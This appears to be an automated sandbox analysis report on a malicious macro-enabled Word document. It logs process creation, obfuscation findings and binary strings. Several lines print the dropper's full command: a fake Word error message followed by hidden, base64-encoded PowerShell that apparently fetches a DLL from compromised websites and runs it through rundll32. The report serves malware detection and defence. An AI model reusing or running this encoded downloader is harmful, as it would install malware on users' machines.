                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: mscorlib.pdb` source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdbO source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2107891055.0000000002820000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbles AA source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: ARCHIVOFile-20-012021.docStream path 'Macros/VBA/Nst6otvnmgmpw' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Nst6otvnmgmpw
                      Document contains an embedded VBA with many randomly named variablesShow sources
                      Source: ARCHIVOFile-20-012021.docStream path 'Macros/VBA/Nst6otvnmgmpw' : High entropy of concatenated variable names
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC
